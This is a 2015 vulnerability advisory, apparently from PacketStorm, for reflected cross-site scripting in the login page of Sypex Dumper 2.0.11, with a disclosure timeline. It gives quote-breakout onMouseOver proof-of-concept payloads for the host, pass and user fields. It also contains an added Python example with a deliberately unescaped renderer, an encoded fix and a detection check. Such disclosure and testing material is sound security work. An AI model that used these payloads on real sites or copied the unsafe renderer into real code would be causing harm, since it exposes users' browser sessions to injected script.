Sypex Dumper 2.0.11 Cross Site Scripting


Sypex Dumper version 2.0.11 suffers from multiple cross site scripting vulnerabilities.

Credits: John Page ( hyp3rlinx )
Domains: hyp3rlinx.altervista.org

Source:
http://hyp3rlinx.altervista.org/advisories/AS-SYPEX0529.txt

Vendor:
https://sypex.net


Product:
Sypex Dumper 2.0.11 is a PHP web based MySQL database management system.


Advisory Information:
================================================
Sypex Dumper 2.0.11 XSS Vulnerabilities

XSS

Vulnerability Details:
=====================
Login page input fields are vulnerable to XSS via the POST method,
allowing remote attackers to execute arbitrary code in the
context of a user's browser session.


Exploit code(s):
===============

host="onMouseOver="alert(666);
pass="onMouseOver="alert(666);
user="onMouseOver="alert(666);
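The advisory describes the three login fields reflecting POST input inside an HTML attribute, which is why a leading quote in the value is enough to start a new attribute. Below is an added example, not Sypex Dumper's own (PHP) code: a hypothetical renderer written the vulnerable way beside the attribute-encoded version, and a parser-based check that a tester or code reviewer can run over rendered markup to see whether the input escaped the `value` attribute. The field names and proof-of-concept value come from the advisory; everything else is an assumption.

```python
import html
from html.parser import HTMLParser

# Added example, not Sypex Dumper's code. Field names follow the advisory.
FIELDS = ("host", "user", "pass")

# Constructed input: the advisory's proof-of-concept value in every field.
POC_VALUE = '"onMouseOver="alert(666);'
POC_POST = {field: POC_VALUE for field in FIELDS}


def render_login_unsafe(post: dict) -> str:
    """Hypothetical vulnerable pattern: POST values echoed into value="..."
    unescaped, so a quote ends the attribute and the rest becomes new ones."""
    return "".join(
        f'<input type="text" name="{f}" value="{post.get(f, "")}">\n' for f in FIELDS
    )


def render_login_safe(post: dict) -> str:
    """Hardened version: encode for the attribute context. quote=True turns
    both " and ' into entities, so input cannot terminate the attribute."""
    return "".join(
        f'<input type="text" name="{f}" value="{html.escape(post.get(f, ""), quote=True)}">\n'
        for f in FIELDS
    )


class InputAttrs(HTMLParser):
    """Collects each <input>'s attributes as a browser would tokenise them."""

    def __init__(self):
        super().__init__()
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append(dict(attrs))


def injected_event_handlers(markup: str) -> list:
    """Names of on* attributes on the rendered inputs. Any hit means the input
    broke out of value="..."; an empty list means the encoding held."""
    parser = InputAttrs()
    parser.feed(markup)
    parser.close()
    return [n for attrs in parser.inputs for n in attrs if n.startswith("on")]
```

Running `injected_event_handlers` over `render_login_unsafe(POC_POST)` reports an `onmouseover` handler on each of the three inputs, while the encoded form reports none and still round-trips the original value.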


Disclosure Timeline:
=========================================================


May 27, 2015: Vendor Notification
May 29, 2015: Public Disclosure



Severity Level:
=========================================================
Medium


Description:
==========================================================

Request Method(s):
                                [+] POST

Vulnerable Product:
                                [+] Sypex Dumper 2.0.11

Vulnerable Parameter(s):
                                [+] host, pass, user

Affected Area(s):
                                [+] Login page

===============================================================

(hyp3rlinx)

Source: PacketStorm
